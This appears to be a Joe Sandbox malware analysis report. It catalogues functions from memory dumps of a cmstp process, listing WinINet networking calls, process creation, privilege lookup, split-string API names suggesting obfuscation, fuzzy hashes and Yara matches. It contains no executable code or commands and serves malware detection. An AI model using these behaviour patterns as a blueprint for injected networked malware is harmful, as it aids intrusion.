Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 051196DA

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 36db496568d8da367f3808f2f6de3c980701c2de35d9c20c0188eaa96e39d5b1
Instruction ID: 225c96959ecfa9b1f1263376e61ff3d3df96d20a612ce13610306cf779acd053
Opcode Fuzzy Hash: 36db496568d8da367f3808f2f6de3c980701c2de35d9c20c0188eaa96e39d5b1
Instruction Fuzzy Hash: C590027120101842D10061599544B46001597E0351FA1C41AA4155654D8759C8727561

Uniqueness

Uniqueness Score: -1.00%

Function 051196E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 051196EA

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f2ddcfa9f10482cce65deef864f17b114ff95710a91816ff10871b7919261d57
Instruction ID: 4aba79cbebfd857e7bd31faf1c48bfdbf109c9ecd989239088161b693524f06e
Opcode Fuzzy Hash: f2ddcfa9f10482cce65deef864f17b114ff95710a91816ff10871b7919261d57
Instruction Fuzzy Hash: F390027120109802D1106159D54474A001597D0351FA5C815A8455658D87D988B27161

Uniqueness

Uniqueness Score: -1.00%

Function 05119910 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0511991A

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: aff5ad1b06e49bc6b240e04325d3f83bc1a161d79be7263a7c59fc96ca3b9a7f
Instruction ID: 58c5e760464fe095f098d93c5af7571e569acef412831fc42567186e5319c6cd
Opcode Fuzzy Hash: aff5ad1b06e49bc6b240e04325d3f83bc1a161d79be7263a7c59fc96ca3b9a7f
Instruction Fuzzy Hash: 9C9002B120101402D14071599544746001597D0351FA1C415A9095554E879D8DF676A5

Uniqueness

Uniqueness Score: -1.00%

Function 051199A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 051199AA

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6431afdf358ebec37cc44beb799d3c432617882fbc8bf169cab587a97951b949
Instruction ID: 2dea6ff602ef521f653848213dc190155a39f1f1a19f5b9c85ede366f22fa505
Opcode Fuzzy Hash: 6431afdf358ebec37cc44beb799d3c432617882fbc8bf169cab587a97951b949
Instruction Fuzzy Hash: D09002A134101442D10061599554B060015D7E1351FA1C419E5095554D875DCC737166

Uniqueness

Uniqueness Score: -1.00%

Function 05119840 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0511984A

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 18883dafcf6a45392ccf6d79c1fd720dc7c41e4abdcf00509d1694c46ba2ad90
Instruction ID: 7723e09a216c5d792cd48d8c997825025ae0b0665790f7762d1a67dd2f0c6a03
Opcode Fuzzy Hash: 18883dafcf6a45392ccf6d79c1fd720dc7c41e4abdcf00509d1694c46ba2ad90
Instruction Fuzzy Hash: D0900261242051525545B15995445074016A7E02917E1C416A5445950C866A9877E661

Uniqueness

Uniqueness Score: -1.00%

Function 05119860 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0511986A

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 47d337e2a5ada1398d80c8fc2e186e0dda09a842cb55e6f6174e4da257e0fb1f
Instruction ID: e79d497553d0e28d6e91e90be2935fcb506812286e352f37dc1f034e1e40dcfe
Opcode Fuzzy Hash: 47d337e2a5ada1398d80c8fc2e186e0dda09a842cb55e6f6174e4da257e0fb1f
Instruction Fuzzy Hash: 5E90027120101413D11161599644707001997D0291FE1C816A4455558D979A8973B161

Uniqueness

Uniqueness Score: -1.00%

Function 05119A50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05119A5A

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5f94002a8f07986864f21debde665e3b46c435d97b1f1d751d62f5966365f971
Instruction ID: 9969846dc318712bd867f165d4c9aec9d888d34bf1c61a97c6dd05b92730539b
Opcode Fuzzy Hash: 5f94002a8f07986864f21debde665e3b46c435d97b1f1d751d62f5966365f971
Instruction Fuzzy Hash: AB90026121181042D20065699D54B07001597D0353FA1C519A4185554CCA5988726561

Uniqueness

Uniqueness Score: -1.00%

Function 00DC8CE0 Relevance: 15.8, APIs: 1, Strings: 8, Instructions: 48
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HttpOpenRequestA.WININET(RequestA,OpenRequestA,HttpOpenRequestA,00000000,?,?,?,?,?,?,?,00000000), ref: 00DC8D48

Strings

Requ, xrefs: 00DC8D08
HttpOpenRequestA, xrefs: 00DC8D3A, 00DC8D45
Http, xrefs: 00DC8CFA
estA, xrefs: 00DC8D0F
HttpOpenRequestA, xrefs: 00DC8CED
OpenRequestA, xrefs: 00DC8D3E, 00DC8D46
Open, xrefs: 00DC8D01
RequestA, xrefs: 00DC8D42, 00DC8D47

Memory Dump Source

Source File: 00000010.00000002.514085622.0000000000DB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_db0000_cmstp.jbxd

Yara matches

Similarity

API ID: HttpOpenRequest
String ID: Http$HttpOpenRequestA$HttpOpenRequestA$Open$OpenRequestA$Requ$RequestA$estA
API String ID: 1984915467-4016285707
Opcode ID: 4cfb9678fb708ccf4b305b7de459e0cb374a3b63d560b69bc85e9c03fd5ad30e
Instruction ID: 090d8c5e0d09696208dff362cf9c2b2af4fa4208f3970f5d42a64526c56bccf6
Opcode Fuzzy Hash: 4cfb9678fb708ccf4b305b7de459e0cb374a3b63d560b69bc85e9c03fd5ad30e
Instruction Fuzzy Hash: 9A01E9B2905119AFCB04DF98D841DEFBBB9EB88310F158288FD49A7205D630ED10CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 00DC8D60 Relevance: 15.8, APIs: 1, Strings: 8, Instructions: 42
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HttpSendRequestA.WININET(RequestA,SendRequestA,HttpSendRequestA,00000000,?,?,?,?,00000000), ref: 00DC8DBC

Strings

HttpSendRequestA, xrefs: 00DC8DAE, 00DC8DB9
estA, xrefs: 00DC8D8F
HttpSendRequestA, xrefs: 00DC8D6D, 00DC8D70
Http, xrefs: 00DC8D7A
Send, xrefs: 00DC8D81
SendRequestA, xrefs: 00DC8DB2, 00DC8DBA
Requ, xrefs: 00DC8D88
RequestA, xrefs: 00DC8DB6, 00DC8DBB

Memory Dump Source

Source File: 00000010.00000002.514085622.0000000000DB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_db0000_cmstp.jbxd

Yara matches

Similarity

API ID: HttpRequestSend
String ID: Http$HttpSendRequestA$HttpSendRequestA$Requ$RequestA$Send$SendRequestA$estA
API String ID: 360639707-2503632690
Opcode ID: 59ee1c1fde48dd7e1995adb0c33b817c3f2d336c7a31c9a7f5aeb4c8a727f0e6
Instruction ID: 762a9b40400a54e3de5cb023e8da86536b84e71e6e9e80ab7d56bb0abe7ed87f
Opcode Fuzzy Hash: 59ee1c1fde48dd7e1995adb0c33b817c3f2d336c7a31c9a7f5aeb4c8a727f0e6
Instruction Fuzzy Hash: 530128B2909119AFCB04DF98D845EAFBBB8EB58210F148189FD08A7204D670AE10CBF1

Uniqueness

Uniqueness Score: -1.00%

Function 00DC8D56 Relevance: 15.8, APIs: 1, Strings: 8, Instructions: 41
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HttpSendRequestA.WININET(RequestA,SendRequestA,HttpSendRequestA,00000000,?,?,?,?,00000000), ref: 00DC8DBC

Strings

HttpSendRequestA, xrefs: 00DC8DAE, 00DC8DB9
estA, xrefs: 00DC8D8F
HttpSendRequestA, xrefs: 00DC8D6D, 00DC8D70
Http, xrefs: 00DC8D7A
Send, xrefs: 00DC8D81
SendRequestA, xrefs: 00DC8DB2, 00DC8DBA
Requ, xrefs: 00DC8D88
RequestA, xrefs: 00DC8DB6, 00DC8DBB

Memory Dump Source

Source File: 00000010.00000002.514085622.0000000000DB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_db0000_cmstp.jbxd

Yara matches

Similarity

API ID: HttpRequestSend
String ID: Http$HttpSendRequestA$HttpSendRequestA$Requ$RequestA$Send$SendRequestA$estA
API String ID: 360639707-2503632690
Opcode ID: 470578d1e7124f0a2eeb7949302424e9119b38b46e3a155aba88ba14193b2ffc
Instruction ID: caa92bddbaf8ce83e36e22234d7aa976135fc382b3b8fe484388f092825275a3
Opcode Fuzzy Hash: 470578d1e7124f0a2eeb7949302424e9119b38b46e3a155aba88ba14193b2ffc
Instruction Fuzzy Hash: DA012CB6905159AFCB04DF98C845EEFBB78EB54310F158188FD0967205D670AE10CBF1

Uniqueness

Uniqueness Score: -1.00%

Function 00DC8C60 Relevance: 14.0, APIs: 1, Strings: 7, Instructions: 48
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetConnectA.WININET(ConnectA,rnetConnectA,InternetConnectA,00000000,?,?,?,?,?,?,?,00000000), ref: 00DC8CC8

Strings

InternetConnectA, xrefs: 00DC8CBA, 00DC8CC5
ConnectA, xrefs: 00DC8CC2, 00DC8CC7
rnetConnectA, xrefs: 00DC8CBE, 00DC8CC6
rnet, xrefs: 00DC8C81
Inte, xrefs: 00DC8C7A
ectA, xrefs: 00DC8C8F
Conn, xrefs: 00DC8C88

Memory Dump Source

Source File: 00000010.00000002.514085622.0000000000DB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_db0000_cmstp.jbxd

Yara matches

Similarity

API ID: ConnectInternet
String ID: Conn$ConnectA$Inte$InternetConnectA$ectA$rnet$rnetConnectA
API String ID: 3050416762-1024195942
Opcode ID: 9d030a777e5cccec2ac6e3d13d24fbac149be2e6a7ed5dee5ea452bd7c4c0401
Instruction ID: d58f44c8e07d90e1665d30062e65ad801cb8c0d0b502c2cfc961fb4b00428aa1
Opcode Fuzzy Hash: 9d030a777e5cccec2ac6e3d13d24fbac149be2e6a7ed5dee5ea452bd7c4c0401
Instruction Fuzzy Hash: 4E01E9B2915119AFCB14DF99D941EEFB7B8EB48310F154289FE08A7241D670EE10CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 00DC8BF0 Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 41
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenA.WININET(rnetOpenA,InternetOpenA,?,?,?), ref: 00DC8C47

Strings

Open, xrefs: 00DC8C18
InternetOpenA, xrefs: 00DC8C3D, 00DC8C45
rnetOpenA, xrefs: 00DC8C41, 00DC8C46
rnet, xrefs: 00DC8C11
Inte, xrefs: 00DC8C0A
A, xrefs: 00DC8C1F

Memory Dump Source

Source File: 00000010.00000002.514085622.0000000000DB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_db0000_cmstp.jbxd

Yara matches

Similarity

API ID: InternetOpen
String ID: A$Inte$InternetOpenA$Open$rnet$rnetOpenA
API String ID: 2038078732-3155091674
Opcode ID: 8f93591177d63440a7d4fcc38820cef4d44ce1c8150f9d8762720a548369221d
Instruction ID: 647510f853b44ec867131a0f6374ae288572a310d474d28599e00933b95efc83
Opcode Fuzzy Hash: 8f93591177d63440a7d4fcc38820cef4d44ce1c8150f9d8762720a548369221d
Instruction Fuzzy Hash: F9F019B2901119AF8B14DFD8DD41DFBB7B8EF88310B048689FE1897201D634AE50CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 00DC8BE8 Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 36
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenA.WININET(rnetOpenA,InternetOpenA,?,?,?), ref: 00DC8C47

Strings

Open, xrefs: 00DC8C18
InternetOpenA, xrefs: 00DC8C3D, 00DC8C45
rnetOpenA, xrefs: 00DC8C41, 00DC8C46
rnet, xrefs: 00DC8C11
Inte, xrefs: 00DC8C0A
A, xrefs: 00DC8C1F

Memory Dump Source

Source File: 00000010.00000002.514085622.0000000000DB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_db0000_cmstp.jbxd

Yara matches

Similarity

API ID: InternetOpen
String ID: A$Inte$InternetOpenA$Open$rnet$rnetOpenA
API String ID: 2038078732-3155091674
Opcode ID: b40e262f14ee793cf65fd6d8480bcac79bb83f7decf261e57aecc11e132fbd0c
Instruction ID: 3416b286190090d8312952edd48fd1f43c9771a40801941af2a5b5a462aec45e
Opcode Fuzzy Hash: b40e262f14ee793cf65fd6d8480bcac79bb83f7decf261e57aecc11e132fbd0c
Instruction Fuzzy Hash: 79F01DB2901119AF8B14DF98D945DBBBBB8FF48310B04864DFE145B201D230AA50CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 00DC72F0 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(000007D0), ref: 00DC7398

Strings

net.dll, xrefs: 00DC7361, 00DC73E7, 00DC73BF, 00DC73CB, 00DC73F3
wininet.dll, xrefs: 00DC734E, 00DC7357

Memory Dump Source

Source File: 00000010.00000002.514085622.0000000000DB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_db0000_cmstp.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: a8d71f0b9356a5c2a5702f790f2a1c7e1329a0296614cd9b1809980169c75d1f
Instruction ID: a339b4416a1f755b0a2e358488595c6277b5094d07731493ea2b0ab679d8d9d5
Opcode Fuzzy Hash: a8d71f0b9356a5c2a5702f790f2a1c7e1329a0296614cd9b1809980169c75d1f
Instruction Fuzzy Hash: 1831A1B6505705ABC715DF68C8A1FABB7B8FF48700F04811DFA5A9B241D730A946CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 00DC72E6 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 80
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(000007D0), ref: 00DC7398

Strings

net.dll, xrefs: 00DC7361, 00DC73BF, 00DC73CB
wininet.dll, xrefs: 00DC734E, 00DC7357

Memory Dump Source

Source File: 00000010.00000002.514085622.0000000000DB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_db0000_cmstp.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: c4cb72fb37d3fb289b8decf5537e14b72cdd7cc22d7ada190e4fc5b061aa2d75
Instruction ID: 29e3db8b92b3a67e32296dde719871e7c157a6e80b06698cc51dab88ebec6366
Opcode Fuzzy Hash: c4cb72fb37d3fb289b8decf5537e14b72cdd7cc22d7ada190e4fc5b061aa2d75
Instruction Fuzzy Hash: 5021D0B2605606ABC715EF64C8A1FABBBB4FF48700F04811DFA599B241D771A406DFB0

Uniqueness

Uniqueness Score: -1.00%

Function 00DC88E0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00DB3B93), ref: 00DC890D

Strings

.z`, xrefs: 00DC88FC, 00DC8908

Memory Dump Source

Source File: 00000010.00000002.514085622.0000000000DB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_db0000_cmstp.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction ID: e216a9a74134065df0457a0339aa26c6a1de07c25f78a2c876cffc6fe81d465f
Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction Fuzzy Hash: 3DE012B2200209ABDB18EF99CC49EA777ACEF88750F018558BE085B242C630E910CAB0

Uniqueness

Uniqueness Score: -1.00%

Function 00DB7280 Relevance: 3.1, APIs: 2, Instructions: 55
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 00DB72DA
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 00DB72FB

Memory Dump Source

Source File: 00000010.00000002.514085622.0000000000DB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_db0000_cmstp.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 7a277fafb3f9668102af2c224306ddf972237c2bdd995d78dbfd703b77ee5a33
Instruction ID: 65e0bf023084781eda6c6f7006b87bb2705f2bfc8043f72b35382b3ae001ce73
Opcode Fuzzy Hash: 7a277fafb3f9668102af2c224306ddf972237c2bdd995d78dbfd703b77ee5a33
Instruction Fuzzy Hash: 0201A731E80229BBE721A6949C43FFE776C9B41B51F144118FF04BB1C1E694690547F6

Uniqueness

Uniqueness Score: -1.00%

Function 00DB9B30 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00DB9BA2

Memory Dump Source

Source File: 00000010.00000002.514085622.0000000000DB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_db0000_cmstp.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
Instruction ID: d9a1f7b8b245bbd5bbfe20098f575b2adb2f4132cf905320a2c70a71e071db13
Opcode Fuzzy Hash: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
Instruction Fuzzy Hash: 4E011EB5D4020EABDB10DAE4EC96FDDB3789B54308F144199EA0997241F671EB14CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 00DC8950 Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00DC89A4

Memory Dump Source

Source File: 00000010.00000002.514085622.0000000000DB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_db0000_cmstp.jbxd

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction ID: efd78657bd510616152610fee2d94a1c1301b33e6fb5e55a3bbbbafb037e3c91
Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction Fuzzy Hash: D901AFB2210208AFCB58DF89DC85EEB77ADAF8C754F158258BA0D97241C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00DC7420 Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,00DBCCE0,?,?), ref: 00DC745C

Memory Dump Source

Source File: 00000010.00000002.514085622.0000000000DB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_db0000_cmstp.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: af9389d226f702299f90595758b04f6a8dd9e8f14d540d3b33198cdea3309bf1
Instruction ID: 1fda195fef43b2fe6345a48c6dff68e74ca4336d9b875d83539cbca9a4fc23ca
Opcode Fuzzy Hash: af9389d226f702299f90595758b04f6a8dd9e8f14d540d3b33198cdea3309bf1
Instruction Fuzzy Hash: E3E06D333902043AE32065A9AC02FA7B29CDB81B20F15003AFA0DEB2C1D595F80142B4

Uniqueness

Uniqueness Score: -1.00%

Function 00DC7413 Relevance: 1.5, APIs: 1, Instructions: 35threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,00DBCCE0,?,?), ref: 00DC745C

Memory Dump Source

Source File: 00000010.00000002.514085622.0000000000DB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_db0000_cmstp.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 82a6af472cbfff1939cd774d7abe95c6d323d5c629e9ee85a39565ab4cdde24e
Instruction ID: 863c9160a04cb0721ac0de3dc340d7ccad259753aac064cf782d9a2025c80697
Opcode Fuzzy Hash: 82a6af472cbfff1939cd774d7abe95c6d323d5c629e9ee85a39565ab4cdde24e
Instruction Fuzzy Hash: F8F02B323843053AD2315A989C43FE7739DDB81B10F25422AF749EB2D1D595F94187B4

Uniqueness

Uniqueness Score: -1.00%

Function 00DC88A0 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00DC3526,?,00DC3C9F,00DC3C9F,?,00DC3526,?,?,?,?,?,00000000,00000000,?), ref: 00DC88CD

Memory Dump Source

Source File: 00000010.00000002.514085622.0000000000DB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_db0000_cmstp.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction ID: 5a4f0ad25b6afc48058d6169eb5d5ca971f1f5b519436d10680d4ea5e67d7500
Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction Fuzzy Hash: 40E012B2200208ABDB18EF99CC45EA777ACEF88750F158558BE085B242C630F910CAB0

Uniqueness

Uniqueness Score: -1.00%

Function 00DC8A40 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,00DBCFB2,00DBCFB2,?,00000000,?,?), ref: 00DC8A70

Memory Dump Source

Source File: 00000010.00000002.514085622.0000000000DB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_db0000_cmstp.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction ID: 1af9f87335fcd49485d477223c1b8298101e5fa4ecc30d06be0bf134abadac7a
Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction Fuzzy Hash: E1E01AB1600208ABDB14DF49CC85EE777ADEF88750F018154BE0857241C930E8108BF5

Uniqueness

Uniqueness Score: -1.00%

Function 00DC8A3D Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,00DBCFB2,00DBCFB2,?,00000000,?,?), ref: 00DC8A70

Memory Dump Source

Source File: 00000010.00000002.514085622.0000000000DB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_db0000_cmstp.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: dae02b5c63bb517bcfa8940d5b61ada6c97c3f2714b062b946fa018bc79783e5
Instruction ID: d9d3bca7ffa7e5f3fc17e6f11536b5759ca0e5afb5032435fab9eece60c96aeb
Opcode Fuzzy Hash: dae02b5c63bb517bcfa8940d5b61ada6c97c3f2714b062b946fa018bc79783e5
Instruction Fuzzy Hash: 25E01AB5600214AFDB14DF54CC89EEB3769EF88350F118559F90DAB241CA30E8148BB0

Uniqueness

Uniqueness Score: -1.00%

Function 00DBD420 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,00DB7C83,?), ref: 00DBD44B

Memory Dump Source

Source File: 00000010.00000002.514085622.0000000000DB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_db0000_cmstp.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
Instruction ID: c807c22a1fede162f0995ca113d7324d60d58a39e897212bec80e71ff54f240c
Opcode Fuzzy Hash: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
Instruction Fuzzy Hash: 02D05E617503046AE610BAA49C03F66728D9B44B00F494064F949972C3E964E5004571

Uniqueness

Uniqueness Score: -1.00%

